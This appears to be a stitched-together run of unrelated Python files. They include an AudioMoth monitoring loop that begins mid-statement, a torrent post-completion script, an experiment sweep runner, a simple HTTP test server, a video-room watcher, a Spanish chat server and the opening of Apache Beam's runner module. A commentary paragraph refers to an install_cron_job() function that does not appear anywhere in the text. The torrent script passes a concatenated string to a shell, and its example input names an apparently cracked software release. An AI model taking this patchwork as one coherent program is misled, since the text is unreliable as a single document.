datetime.utcnow() pi_disk_check = d.check_disk(report = True, display = True, path = cfg.paths.root ) moth_disk_check = {} send_status_email() while attempt <= max_attempt and not success: try: am.resetMoth() am.mountMoth() # Clean up the AudioMoth to begin d.remove_files(am.mount_path, pattern = "*.WAV", sudo = True) moth_disk_check = d.check_disk(report = True, display = True, path = am.mount_path) # Configure the AudioMoth for the next recording session am.usbModeOn() am.setTime() # Unmount to allow recording to commence am.unmountMoth() success = True except: print(f'Startup attempt {attempt} of {max_attempt} failed') attempt = attempt + 1 if not success: logger.warning('AudioMoth startup failed') print('Please check AudioMoth') d.sendmail(cfg.name, f"{cfg.name} Error: AudioMoth Failure", cfg.emailto) sleep(5) exit() # Main Loop while True: if movement(None) > 0: e = on_motion() d.sendmail(cfg.name, f"{cfg.name} Motion Event (id:{e.id})", cfg.emailto) # Detect when motion stops while not e.has_ended(): e.enqueue(movement(e)) on_no_motion(e) check_power() check_reboot() check_restart() while cfg.is_stop_required(): cfg.stop() print('Paused', flush=True) d.sendmail(f"{cfg.name} Server Stop", f"{cfg.name} Server Stop", cfg.emailto) logger.info('Paused') while cfg.is_stop_required(): sleep(1) check_power() check_reboot() check_restart() cfg.stop_clear() logger.info('Resumed') d.sendmail(f"{cfg.name} Server Resume", f"{cfg.name} Server Resume", cfg.emailto) print('Resumed', flush=True)
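install_cron_job() above is deliberately idempotent: it returns an existing entry found by its comment tag rather than creating a duplicate, so install_cron_jobs() can run on every boot. A hedged stand-alone sketch of the same pattern with python-crontab follows; the command path and comment tag are placeholders.

import crontab


def install_or_reuse(tab, command, comment):
    """Return the cron job tagged with `comment`, creating it only if missing."""
    for job in tab.find_comment(comment):
        return job                      # already installed; keep the existing entry
    return tab.new(command=command, comment=comment)


if __name__ == '__main__':
    tab = crontab.CronTab(user=True)
    job = install_or_reuse(tab, '/home/pi/jobs/job_send_heartbeat.py', 'heartbeat')
    job.minute.every(1)                 # re-applying the schedule is harmless
    tab.write()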
torrent_script.py
''' @author: Joseph Milazzo @description: A script which is run after a uTorrent torrent has completed downloading. This script will copy the torrent data to the appropriate directory on a remote machine. Directory is determined by torrent's label. This script is configurable through config.ini file. This takes arguments from command line. Script Arguements: --name Name of downloaded file (for single file torrents) --dir Directory where files are saved --title Title of torrent --state State of torrent* --label Label --tracker Tracker --status_msg Status message string (same as status column) --info_hash hex encoded info-hash --prev_state Previous state of torrent --kind kind of torrent (single|multi) --log_dir Directory to store log data in *State is a combination of: started = 1 checking = 2 start-after-check = 4 checked = 8 error = 16 paused = 32 auto = 64 loaded = 128 For example, if a torrent job has a status of 201 = 128 + 64 + 8 + 1, then it is loaded, queued, checked, and started. A bitwise AND operator should be used to determine whether the given STATUS contains a particular status. Example Input: Directory="K:\Applications\Advanced SystemCare Pro 7.3.0.454 [ChingLiu]" Torrent Name="Advanced SystemCare Pro 7.3.0.454 [ChingLiu]" Label="Test" Kind="multi" Filename="Activation pictures\Snap1.jpg" Hash="E2BCFD4306B905E3B785F5DB8BA54ACCAE46FFB6" ''' ''' The way the ending script will work is it will start and read needed info from config file. The application will then load all scripts from userscripts (nested folders) and create a queue from them (scripts can define priority to ensure they are scheduled before another). Each script will execute in priority order on a separate thread or coroutine. Once all scripts execute (or expire if not completed after threadshold (user defined) is met, the program logs and terminates.) This script is defined for uTorrent, but it should be usable by other torrenting programs. Ensure you use proper encapsulation and inheritance for this. :) ''' import argparse import commands import ConfigParser from collections import namedtuple from flask import Flask # Used for web API import flask import logging import json import uTorrent import os import signal import subprocess import sys import threading import time Torrent = namedtuple('Torrent', ['directory', 'kind', 'label', 'name', 'title', 'state', 'prev_sate', 'tracker', 'status_msg', 'info_hash']) class ScriptThread(threading.Thread): try: def __init__(self, script_file): threading.Thread.__init__(self) self.script_file = script_file def run(self): print 'Thread runnning for ' + os.path.abspath(self.script_file) subprocess.call('python ' + self.script_file, stderr=subprocess.STDOUT, shell=True) except Exception, e: raise e # TODO: Fix this def sig_handler(): logger.log('Signal Handler called') app.stop() flask.request.environ.get('werkzeug.server.shutdown')() app_thread.join() [t.join() for t in threads] def config_section_map(section): dict1 = {} options = config.options(section); for option in options: try: dict1[option] = config.get(section, option); if dict1[option] == -1: print("skip: %s" % option); except: print("exception on %s!" 
% option); dict1[option] = None; return dict1; def get_argument(argument, default="None"): if argument: return argument[0] else: return default def start_app(): app.run() def init(): global config # Create Configuration Parser and setup Logger config = ConfigParser.ConfigParser() config.read("config.ini") log_file = config_section_map("Logging")['log_file'] lpath = config_section_map("Logging")['log_directory'] if lpath is None: lpath = '.' log_directory = os.path.abspath(lpath) if not os.path.exists(log_directory): os.mkdir(log_directory) log_filePath = os.path.join(log_directory, log_file) if not os.path.isfile(log_filePath): with open(log_filePath, "w") as emptylog_file: emptylog_file.write(''); logging.basicConfig(filename=log_filePath,level=logging.DEBUG) logger = logging.getLogger(__name__); logger.info("######### Script Executed at " + time.asctime(time.localtime(time.time()))) # CLI parser = argparse.ArgumentParser() parser.add_argument('--state', required=False, nargs=1, help="State of torrent") parser.add_argument('--prev_state', required=False, nargs=1, help="Previous state of torrent") parser.add_argument('--tracker', required=False, nargs=1, help="Torrent's tracker") parser.add_argument('--status_msg', required=False, nargs=1, help="Status message string (same as status column)") parser.add_argument('--dir', required=False, nargs=1, help="Directory where files are saved") parser.add_argument('--name', required=False, nargs=1, help="Name of downloaded file (for single file torrents)") parser.add_argument('--title', required=False, nargs=1, help="Title of torrent") parser.add_argument('--label', required=False, nargs=1, help="Torrent's label") parser.add_argument('--kind', required=False, nargs=1, help="Kind of torrent (single | multi)") parser.add_argument('--info_hash', required=False, nargs=1, help="Hex encoded info-hash") args = parser.parse_args() torrent = None try: logger.info("Parsing Arguments") # Required Arguments torrent_dir = str(get_argument(args.dir)) torrent_kind = str(get_argument(args.kind)) torrent_label = str(get_argument(args.label)) torrent_name = str(get_argument(args.name)) torrent_title = str(get_argument(args.title)) # Optional Arguments torrent_state = int(get_argument(args.state, -1)) torrent_prev_state = int(get_argument(args.prev_state, -1)) torrent_tracker = str(get_argument(args.tracker)) torrent_status_msg = str(get_argument(args.status_msg)) torrent_info_hash = str(get_argument(args.info_hash)) torrent = Torrent(torrent_dir, torrent_kind, torrent_label, torrent_name, torrent_title, torrent_state, torrent_prev_state, torrent_tracker, torrent_status_msg, torrent_info_hash) except Exception, e: logger.info(str(e)) logger.info("Finished Parsing Arguments") return torrent app = Flask(__name__) @app.route('/getTorrent', methods=['GET', 'POST']) def get_torrent(): ''' Returns the torrent that has triggered this script ''' return json.dumps(torrent.__dict__) @app.route('/shutdown', methods=['POST']) def shutdown(): ''' Kills the server. ''' flask.request.environ.get('werkzeug.server.shutdown')() return 'Server Shutdown' @app.route('/done', methods=['POST']) def userscript_finished(): ''' Userscript is finished executing. Increment script counter. 
''' global finished_userscripts finished_userscripts += 1 if finished_userscripts >= len(scripts): flask.request.environ.get('werkzeug.server.shutdown')() return str(finished_userscripts) @app.route('/stopTorrent', methods=['POST']) def stop_torrent(arguments): global torrent_client print arguments torrent_client.stop_torrent(arguments.hash) return '{}' scripts = [] threads = [] finished_userscripts = 0 if __name__ == '__main__': # Register signals, such as CTRL + C signal.signal(signal.SIGINT, sig_handler) signal.signal(signal.SIGTERM, sig_handler) global torrent global torrent_client torrent = init() if torrent is None: logger.warn('Torrent is not set!') # Setup WebAPI-enabled Torrent Client url = 'http://' + config_section_map("Web API")['address'] + ':' + config_section_map("Web API")['port'] + '/gui/' torrent_client = uTorrent.uTorrent(url, config_section_map("Web API")['username'], config_section_map("Web API")['password']) global app_thread app_thread = threading.Thread(target=start_app).start() # Find userscripts userscript_dir = os.path.abspath('userscripts') exclude = [] for root, dirs, files in os.walk(userscript_dir, topdown=True): dirs[:] = [d for d in dirs if d not in exclude] for file in files: if file.endswith('.py'): # Add file to pqueue scripts.append(os.path.join(root, file)) # Let's execute some coroutines for script in scripts: t = ScriptThread(script).start() threads.append(t)
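# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original script): the module docstring
# above describes --state as a bit field (started=1, checking=2,
# start-after-check=4, checked=8, error=16, paused=32, auto=64, loaded=128)
# and notes that a bitwise AND should be used to test for a particular
# status.  A minimal decoder for that convention could look like this; the
# STATE_FLAGS and decode_state names are assumptions, not part of uTorrent
# or of the script above.
STATE_FLAGS = [
    ('started', 1),
    ('checking', 2),
    ('start-after-check', 4),
    ('checked', 8),
    ('error', 16),
    ('paused', 32),
    ('auto', 64),
    ('loaded', 128),
]


def decode_state(state):
    """Return the list of flag names set in a uTorrent state integer."""
    return [name for name, bit in STATE_FLAGS if state & bit]


# Example from the docstring: 201 = 128 + 64 + 8 + 1
# decode_state(201) -> ['started', 'checked', 'auto', 'loaded']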
run_parameter_sweep.py
'''
Copyright (c) Microsoft Corporation. All rights reserved.

Licensed under the MIT License.
'''
import time
import itertools
import subprocess
from multiprocessing import Process, Queue


def do_work(work):
    while not work.empty():
        experiment = work.get()
        print(experiment)
        subprocess.call(experiment.split(" "))
    return True


NUM_PROCESSES = 5
work = Queue()

################################################
# Run the algorithm with the dataset footprints
################################################
datasets = ["poultry_barns", "solar_farms_reduced"]
cluster_options = {
    "poultry_barns": [16, 32, 64],
    "solar_farms_reduced": [16, 32, 64],
}
buffer_options = {
    "poultry_barns": [400, 200, 100],
    "solar_farms_reduced": [0.024, 0.016],
}

for dataset in datasets:
    for num_clusters, buffer, in itertools.product(cluster_options[dataset], buffer_options[dataset]):
        command = f"python run_algorithm.py --dataset {dataset} --num_clusters {num_clusters} --buffer {buffer} --output_dir results/kl/{dataset}-{num_clusters}-{buffer}/ --algorithm kl"
        work.put(command)

################################################
# Run the algorithm with the random polygons
################################################
datasets = ["poultry_barns_random", "solar_farms_reduced_random"]
cluster_options = {
    "poultry_barns_random": [16, 32, 64],
    "solar_farms_reduced_random": [16, 32, 64],
}
buffer_options = {
    "poultry_barns_random": [400, 200, 100],
    "solar_farms_reduced_random": [0.024, 0.016],
}

for dataset in datasets:
    for num_clusters, buffer, in itertools.product(cluster_options[dataset], buffer_options[dataset]):
        command = f"python run_algorithm.py --dataset {dataset} --num_clusters {num_clusters} --buffer {buffer} --output_dir results/kl/{dataset}-{num_clusters}-{buffer}/ --algorithm kl"
        work.put(command)

## Start experiments
processes = []
start_time = time.time()
for i in range(NUM_PROCESSES):
    p = Process(target=do_work, args=(work,))
    processes.append(p)
    p.start()

for p in processes:
    p.join()
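# ---------------------------------------------------------------------------
# Illustrative note (not part of the original script): checking work.empty()
# and then calling work.get() is not atomic, so in principle a worker can
# block on get() if another process drains the queue between the two calls.
# A common variant is to use get_nowait() and treat queue.Empty as the signal
# to exit; this is a sketch of that pattern with made-up names, not a change
# made by the authors.
import subprocess
from multiprocessing import Process, Queue
from queue import Empty


def do_work_nonblocking(queue_of_commands):
    while True:
        try:
            experiment = queue_of_commands.get_nowait()
        except Empty:
            return True
        print(experiment)
        subprocess.call(experiment.split(" "))


if __name__ == "__main__":
    demo_work = Queue()
    demo_work.put("echo hello")
    demo_workers = [Process(target=do_work_nonblocking, args=(demo_work,)) for _ in range(2)]
    for p in demo_workers:
        p.start()
    for p in demo_workers:
        p.join()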
webserver.py
#!/usr/bin/env python # This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this file, # You can obtain one at http://mozilla.org/MPL/2.0/. import BaseHTTPServer import SimpleHTTPServer import errno import logging import threading import posixpath import socket import sys import os import urllib import urlparse import re import time from SocketServer import ThreadingMixIn class EasyServer(ThreadingMixIn, BaseHTTPServer.HTTPServer): allow_reuse_address = True acceptable_errors = (errno.EPIPE, errno.ECONNABORTED) def handle_error(self, request, client_address): error = sys.exc_value if ((isinstance(error, socket.error) and isinstance(error.args, tuple) and error.args[0] in self.acceptable_errors) or (isinstance(error, IOError) and error.errno in self.acceptable_errors)): pass # remote hang up before the result is sent else: logging.error(error) class Request(object): """Details of a request.""" # attributes from urlsplit that this class also sets uri_attrs = ('scheme', 'netloc', 'path', 'query', 'fragment') def __init__(self, uri, headers, rfile=None): self.uri = uri self.headers = headers parsed = urlparse.urlsplit(uri) for i, attr in enumerate(self.uri_attrs): setattr(self, attr, parsed[i]) try: body_len = int(self.headers.get('Content-length', 0)) except ValueError: body_len = 0 if body_len and rfile: self.body = rfile.read(body_len) else: self.body = None class RequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): docroot = os.getcwd() # current working directory at time of import proxy_host_dirs = False request_log = [] log_requests = False request = None def _try_handler(self, method): if self.log_requests: self.request_log.append({ 'method': method, 'path': self.request.path, 'time': time.time() }) handlers = [handler for handler in self.urlhandlers if handler['method'] == method] for handler in handlers: m = re.match(handler['path'], self.request.path) if m: (response_code, headerdict, data) = \ handler['function'](self.request, *m.groups()) self.send_response(response_code) for (keyword, value) in headerdict.iteritems(): self.send_header(keyword, value) self.end_headers() self.wfile.write(data) return True return False def parse_request(self): retval = SimpleHTTPServer.SimpleHTTPRequestHandler.parse_request(self) self.request = Request(self.path, self.headers, self.rfile) return retval def do_GET(self): if not self._try_handler('GET'): if self.path == '/navigation/redirect': self.send_response(301) self.send_header('Location', '/navigation/res/empty.html') self.end_headers() elif self.docroot: # don't include query string and fragment, and prepend # host directory if required. if self.request.netloc and self.proxy_host_dirs: self.path = '/' + self.request.netloc + \ self.request.path else: self.path = self.request.path SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self) else: self.send_response(404) self.end_headers() self.wfile.write('') def do_POST(self): # if we don't have a match, we always fall through to 404 (this may # not be "technically" correct if we have a local file at the same # path as the resource but... meh) if not self._try_handler('POST'): self.send_response(404) self.end_headers() self.wfile.write('') def do_DEL(self): # if we don't have a match, we always fall through to 404 (this may # not be "technically" correct if we have a local file at the same # path as the resource but... 
meh) if not self._try_handler('DEL'): self.send_response(404) self.end_headers() self.wfile.write('') def translate_path(self, path): # this is taken from SimpleHTTPRequestHandler.translate_path(), # except we serve from self.docroot instead of os.getcwd(), and # parse_request()/do_GET() have already stripped the query string and # fragment and mangled the path for proxying, if required. path = posixpath.normpath(urllib.unquote(self.path)) words = path.split('/') words = filter(None, words) path = self.docroot for word in words: drive, word = os.path.splitdrive(word) head, word = os.path.split(word) if word in (os.curdir, os.pardir): continue path = os.path.join(path, word) return path # I found on my local network that calls to this were timing out # I believe all of these calls are from log_message def address_string(self): return "a.b.c.d" # This produces a LOT of noise def log_message(self, format, *args): pass class Httpd(object): """ Very basic HTTP server class. Takes a docroot (path on the filesystem) and a set of urlhandler dictionaries of the form: { 'method': HTTP method (string): GET, POST, or DEL, 'path': PATH_INFO (regular expression string), 'function': function of form fn(arg1, arg2, arg3, ..., request) } and serves HTTP. For each request, MozHttpd will either return a file off the docroot, or dispatch to a handler function (if both path and method match). Note that one of docroot or urlhandlers may be None (in which case no local files or handlers, respectively, will be used). If both docroot or urlhandlers are None then MozHttpd will default to serving just the local directory. MozHttpd also handles proxy requests (i.e. with a full URI on the request line). By default files are served from docroot according to the request URI's path component, but if proxy_host_dirs is True, files are served from <self.docroot>/<host>/. For example, the request "GET http://foo.bar/dir/file.html" would (assuming no handlers match) serve <docroot>/dir/file.html if proxy_host_dirs is False, or <docroot>/foo.bar/dir/file.html if it is True. """ def __init__(self, host="127.0.0.1", port=8888, docroot=None, urlhandlers=None, proxy_host_dirs=False, log_requests=False): self.host = host self.port = int(port) self.docroot = docroot if not urlhandlers and not docroot: self.docroot = os.getcwd() self.proxy_host_dirs = proxy_host_dirs self.httpd = None self.urlhandlers = urlhandlers or [] self.log_requests = log_requests self.request_log = [] class RequestHandlerInstance(RequestHandler): docroot = self.docroot urlhandlers = self.urlhandlers proxy_host_dirs = self.proxy_host_dirs request_log = self.request_log log_requests = self.log_requests self.handler_class = RequestHandlerInstance def start(self, block=False): """ Start the server. If block is True, the call will not return. If block is False, the server will be started on a separate thread that can be terminated by a call to .stop() """ self.httpd = EasyServer((self.host, self.port), self.handler_class) if block: self.httpd.serve_forever() else: self.server = threading.Thread(target=self.httpd.serve_forever) self.server.setDaemon(True) # don't hang on exit self.server.start() def stop(self): if self.httpd: ### FIXME: There is no shutdown() method in Python 2.4... 
try: self.httpd.shutdown() except AttributeError: pass self.httpd = None __del__ = stop def where_is(self, path): mobile = self.__dict__['mobile'] if mobile == "android": return "file:///%s/%s" % ("android_asset/www", path) elif mobile == "tizen": return "app://%s/%s" % (self.__dict__['appId'], path) else: return "http://%s:%d/%s" % (self.host, self.port, path) def main(args=sys.argv[1:]): # parse command line options from optparse import OptionParser parser = OptionParser() parser.add_option('-p', '--port', dest='port', type="int", default=8888, help="port to run the server on [DEFAULT: %default]") parser.add_option('-H', '--host', dest='host', default='127.0.0.1', help="host [DEFAULT: %default]") parser.add_option('-i', '--external-ip', action="store_true", dest='external_ip', default=False, help="find and use external ip for host") parser.add_option('-d', '--docroot', dest='docroot', default=os.getcwd(), help="directory to serve files from [DEFAULT: %default]") options, args = parser.parse_args(args) if args: parser.error("mozhttpd does not take any arguments") host = options.host # create the server server = Httpd(host=host, port=options.port, docroot=options.docroot) print "Serving '%s' at %s:%s" % (server.docroot, server.host, server.port) server.start(block=True) if __name__ == '__main__': main()
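# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module): the Httpd
# docstring above describes urlhandlers as dicts with 'method', 'path' and
# 'function' keys, where the function receives the Request plus any regex
# groups captured by 'path' and returns (status_code, header_dict, body).
# The hello_handler/demo_handler_usage names and the /hello route below are
# made up for illustration, assuming the classes above are in scope.
import time


def hello_handler(request, name):
    body = "hello %s" % name
    return (200, {'Content-type': 'text/plain'}, body)


def demo_handler_usage():
    httpd = Httpd(port=8889,
                  urlhandlers=[{'method': 'GET',
                                'path': '/hello/([^/]+)$',
                                'function': hello_handler}])
    httpd.start(block=False)   # serve on a background thread
    time.sleep(30)             # ... do other work while the server runs ...
    httpd.stop()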
watcher.py
#!/usr/bin/python3 from threading import Thread, Event from owtapi import OWTAPI from db_query import DBQuery from configuration import env import time office = list(map(float,env["OFFICE"].split(","))) if "OFFICE" in env else None dbhost= env.get("DBHOST",None) inactive_time=float(env["INACTIVE_TIME"]) class RoomWatcher(object): def __init__(self, inactive=inactive_time, stop=Event()): super(RoomWatcher, self).__init__() self._stop=stop self._inactive=inactive self._rooms={} Thread(target=self._cleanup_thread).start() def get(self, name): if name not in self._rooms: return (None,None) return (self._rooms[name]["room"], self._rooms[name]["stream_in"]) def _parse_name(self, name): items=name.split(":") return {"id": items[3], "type": items[1], "subtype": items[2]} def set(self, name, room, stream=None): if name in self._rooms: return self._rooms[name]={ "room": room, "stream_in": stream, "stream_out": { "stream": None, "status": "idle", "rtmpurl": None, }, "sensor": self._parse_name(name), "time": int(time.time()), } def set_stream_out(self, name, status, rtmpurl): if name not in self._rooms: return self._rooms[name]["stream_out"]= {"status": status, "rtmpurl": rtmpurl} def _cleanup_thread(self): owt=OWTAPI() dbs=DBQuery(index="sensors",office=office,host=dbhost) while not self._stop.is_set(): todelete=[] tostartstreamout=[] tostopstreamout=[] for name in self._rooms: try: participants=owt.list_participants(self._rooms[name]["room"]) except: participants=0 now=int(time.time()) print("Watcher: room {} participant {} inactive {} stream-out status {}".format(name,participants,now-self._rooms[name]["time"],self._rooms[name]["stream_out"]["status"]), flush=True) print(self._rooms[name], flush=True) if participants>0: self._rooms[name]["time"]=now elif now-self._rooms[name]["time"]>self._inactive: todelete.append(name) if self._rooms[name]["stream_out"]["status"] == "start": tostartstreamout.append(name) elif self._rooms[name]["stream_out"]["status"] == "stop": tostopstreamout.append(name) for name in tostartstreamout: if self._rooms[name]["sensor"]["subtype"] != "mobile_camera": continue sensor=self._rooms[name]["sensor"] stream1=self._rooms[name]["stream_in"] room1=self._rooms[name]["room"] rtmpurl=self._rooms[name]["stream_out"]["rtmpurl"] try: stream1=stream1 if stream1 else owt.list_streams(room1)[0] except: continue self._rooms[name]["stream_in"]=stream1 if stream1 and rtmpurl: try: self._rooms[name]["stream_out"]["stream"] = owt.start_streaming_outs(room=room1,url=rtmpurl,video_from=stream1)["id"] except: continue else: continue try: dbs.update(sensor["id"],{"status":"disconnected", "url":rtmpurl}) except: continue self._rooms[name]["stream_out"]["status"] = "streaming" for name in tostopstreamout: if self._rooms[name]["sensor"]["subtype"] != "mobile_camera": continue stream1=self._rooms[name]["stream_out"]["stream"] room1=self._rooms[name]["room"] if stream1: try: owt.stop_streaming_outs(room1,stream1) except: continue self._rooms[name]["stream_out"]["status"] = "idle" for name in todelete: stream1=self._rooms[name]["stream_in"] room1=self._rooms[name]["room"] try: streams=[stream1] if stream1 else owt.list_streams(room1) except: streams=[] # for stream1 in streams: # print("Remove stream {}".format(stream1), flush=True) # try: # owt.delete_stream(room1,stream1) # except: # pass print("Remove room {}:{}".format(name,room1), flush=True) try: owt.delete_room(room1) except: pass self._rooms.pop(name,None) self._stop.wait(self._inactive/3.0)
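# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module): RoomWatcher's
# _cleanup_thread is a background loop that polls on an interval and is
# stopped through a threading.Event, using stop.wait(interval) rather than
# time.sleep() so a shutdown request takes effect immediately.  Below is a
# minimal, self-contained version of that pattern; PeriodicWorker and its
# names are invented for illustration.
import threading
import time


class PeriodicWorker:
    def __init__(self, interval=1.0):
        self._stop = threading.Event()
        self._interval = interval
        self._thread = threading.Thread(target=self._run, daemon=True)
        self._thread.start()

    def _run(self):
        while not self._stop.is_set():
            print("tick", time.time())        # placeholder for the real cleanup work
            self._stop.wait(self._interval)   # returns early if stop() is called

    def stop(self):
        self._stop.set()
        self._thread.join()


if __name__ == "__main__":
    worker = PeriodicWorker(interval=0.5)
    time.sleep(2)
    worker.stop()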
servidor_chat.py
from socket import *
from threading import *
import mysql.connector

clientes = {}
direcciones = {}


def configuracion():
    global servidor
    servidor = socket()
    servidor.bind(("", 9998))
    servidor.listen(10)
    print("Esperando conexiones...")
    aceptar_hilo = Thread(target=aceptar_conexiones)
    aceptar_hilo.start()
    aceptar_hilo.join()


def aceptar_conexiones():
    while True:
        cliente_local, direccion_cliente = servidor.accept()
        print("%s:%s conectado. " % direccion_cliente)
        cliente_local.send(bytes("Bienvenido...", "utf-8"))
        direcciones[cliente_local] = direccion_cliente
        Thread(target=encargarse_cliente, args=(cliente_local,)).start()


def encargarse_cliente(cliente):
    nombre = cliente.recv(1024).decode("utf-8")
    clientes[cliente] = nombre
    while True:
        print("chat conectado")
        # if opcion == "chat_grupal":
        #     cliente.send(bytes("bienvenido", "utf-8"))
        print("2")
        # while True:
        mensaje = cliente.recv(1024).decode("utf-8")
        print("3")
        # guardar_mensaje(nombre, mensaje)
        # broadcast(mensaje)
        if mensaje != "{salir}":
            # guardar_mensaje(nombre, mensaje)
            broadcast(mensaje, nombre)
        else:
            del clientes[cliente]
            broadcast("%s ha salido del chat." % nombre)
            break


def broadcast(mensaje, prefix=""):
    print("enviando a todos")
    for sock in clientes:
        sock.send(bytes(prefix + ": " + mensaje, "utf-8"))


# def guardar_mensaje(nombre, mensaje):
#     conexion = mysql.connector.connect(user="root", password="", host="localhost", database="chat")
#     cursor = conexion.cursor()
#     sql = "INSERT INTO comunicaciones(usuario, mensaje) VALUES (%s, %s)"
#     parametros = (str(nombre), str(mensaje))
#     cursor.execute(sql, parametros)
#     conexion.commit()
#     conexion.close

# def broadcast(mensaje, prefix=""):
#     for sock in clientes:
#         sock.send(bytes(prefix + mensaje, "utf-8"))


if __name__ == "__main__":
    configuracion()
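# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original script): a minimal client for
# the server above.  The protocol implied by encargarse_cliente() is: connect
# on port 9998, send the user name first, then send chat messages, and send
# "{salir}" to leave.  The host, user name and messages below are made up;
# a short pause between sends keeps back-to-back messages from being
# coalesced by TCP in this demo.
import time
from socket import socket
from threading import Thread


def recibir(sock):
    while True:
        data = sock.recv(1024)
        if not data:
            break
        print(data.decode("utf-8"))


if __name__ == "__main__":
    cliente = socket()
    cliente.connect(("127.0.0.1", 9998))
    Thread(target=recibir, args=(cliente,), daemon=True).start()
    for texto in ["ana", "hola a todos", "{salir}"]:   # name first, then messages
        cliente.send(bytes(texto, "utf-8"))
        time.sleep(0.5)
    cliente.close()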
fn_runner.py
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """A PipelineRunner using the SDK harness. """ # pytype: skip-file from __future__ import absolute_import from __future__ import print_function import collections import contextlib import copy import itertools import logging import os import queue import subprocess import sys import threading import time from builtins import object from typing import TYPE_CHECKING from typing import Any from typing import Callable from typing import DefaultDict from typing import Dict from typing import Iterable from typing import Iterator from typing import List from typing import Mapping from typing import MutableMapping from typing import Optional from typing import Sequence from typing import Tuple from typing import Type from typing import TypeVar from typing import Union from typing import cast from typing import overload import grpc from typing_extensions import Protocol import apache_beam as beam # pylint: disable=ungrouped-imports from apache_beam import coders from apache_beam.coders.coder_impl import create_InputStream from apache_beam.coders.coder_impl import create_OutputStream from apache_beam.metrics import metric from apache_beam.metrics import monitoring_infos from apache_beam.metrics.execution import MetricResult from apache_beam.options import pipeline_options from apache_beam.options.value_provider import RuntimeValueProvider from apache_beam.portability import common_urns from apache_beam.portability import python_urns from apache_beam.portability.api import beam_artifact_api_pb2 from apache_beam.portability.api import beam_artifact_api_pb2_grpc from apache_beam.portability.api import beam_fn_api_pb2 from apache_beam.portability.api import beam_fn_api_pb2_grpc from apache_beam.portability.api import beam_provision_api_pb2 from apache_beam.portability.api import beam_provision_api_pb2_grpc from apache_beam.portability.api import beam_runner_api_pb2 from apache_beam.portability.api import endpoints_pb2 from apache_beam.runners import pipeline_context from apache_beam.runners import runner from apache_beam.runners.portability import artifact_service from apache_beam.runners.portability import portable_metrics from apache_beam.runners.portability.fn_api_runner import translations from apache_beam.runners.portability.fn_api_runner.translations import create_buffer_id from apache_beam.runners.portability.fn_api_runner.translations import only_element from apache_beam.runners.portability.fn_api_runner.translations import split_buffer_id from apache_beam.runners.portability.fn_api_runner.translations import unique_name from apache_beam.runners.worker import bundle_processor from apache_beam.runners.worker import data_plane from apache_beam.runners.worker import sdk_worker from apache_beam.runners.worker.channel_factory import 
GRPCChannelFactory from apache_beam.runners.worker.sdk_worker import _Future from apache_beam.runners.worker.statecache import StateCache from apache_beam.transforms import environments from apache_beam.transforms import trigger from apache_beam.transforms.window import GlobalWindow from apache_beam.transforms.window import GlobalWindows from apache_beam.utils import profiler from apache_beam.utils import proto_utils from apache_beam.utils import windowed_value from apache_beam.utils.thread_pool_executor import UnboundedThreadPoolExecutor if TYPE_CHECKING: from apache_beam.pipeline import Pipeline from apache_beam.coders.coder_impl import CoderImpl from apache_beam.coders.coder_impl import WindowedValueCoderImpl from apache_beam.portability.api import metrics_pb2 from apache_beam.transforms.window import BoundedWindow T = TypeVar('T') ConstructorFn = Callable[[ Union['message.Message', bytes], 'FnApiRunner.StateServicer', Optional['ExtendedProvisionInfo'], 'GrpcServer' ], 'WorkerHandler'] DataSideInput = Dict[Tuple[str, str], Tuple[bytes, beam_runner_api_pb2.FunctionSpec]] DataOutput = Dict[str, bytes] BundleProcessResult = Tuple[beam_fn_api_pb2.InstructionResponse, List[beam_fn_api_pb2.ProcessBundleSplitResponse]] # This module is experimental. No backwards-compatibility guarantees. ENCODED_IMPULSE_VALUE = beam.coders.WindowedValueCoder( beam.coders.BytesCoder(), beam.coders.coders.GlobalWindowCoder()).get_impl().encode_nested( beam.transforms.window.GlobalWindows.windowed_value(b'')) # State caching is enabled in the fn_api_runner for testing, except for one # test which runs without state caching (FnApiRunnerTestWithDisabledCaching). # The cache is disabled in production for other runners. STATE_CACHE_SIZE = 100 # Time-based flush is enabled in the fn_api_runner by default. 
DATA_BUFFER_TIME_LIMIT_MS = 1000 _LOGGER = logging.getLogger(__name__) class ControlConnection(object): _uid_counter = 0 _lock = threading.Lock() def __init__(self): self._push_queue = queue.Queue( ) # type: queue.Queue[beam_fn_api_pb2.InstructionRequest] self._input = None # type: Optional[Iterable[beam_fn_api_pb2.InstructionResponse]] self._futures_by_id = dict() # type: Dict[str, ControlFuture] self._read_thread = threading.Thread( name='beam_control_read', target=self._read) self._state = BeamFnControlServicer.UNSTARTED_STATE def _read(self): for data in self._input: self._futures_by_id.pop(data.instruction_id).set(data) @overload def push(self, req): # type: (BeamFnControlServicer.DoneMarker) -> None pass @overload def push(self, req): # type: (beam_fn_api_pb2.InstructionRequest) -> ControlFuture pass def push(self, req): if req == BeamFnControlServicer._DONE_MARKER: self._push_queue.put(req) return None if not req.instruction_id: with ControlConnection._lock: ControlConnection._uid_counter += 1 req.instruction_id = 'control_%s' % ControlConnection._uid_counter future = ControlFuture(req.instruction_id) self._futures_by_id[req.instruction_id] = future self._push_queue.put(req) return future def get_req(self): # type: () -> beam_fn_api_pb2.InstructionRequest return self._push_queue.get() def set_input(self, input): # type: (Iterable[beam_fn_api_pb2.InstructionResponse]) -> None with ControlConnection._lock: if self._input: raise RuntimeError('input is already set.') self._input = input self._read_thread.start() self._state = BeamFnControlServicer.STARTED_STATE def close(self): # type: () -> None with ControlConnection._lock: if self._state == BeamFnControlServicer.STARTED_STATE: self.push(BeamFnControlServicer._DONE_MARKER) self._read_thread.join() self._state = BeamFnControlServicer.DONE_STATE class BeamFnControlServicer(beam_fn_api_pb2_grpc.BeamFnControlServicer): """Implementation of BeamFnControlServicer for clients.""" UNSTARTED_STATE = 'unstarted' STARTED_STATE = 'started' 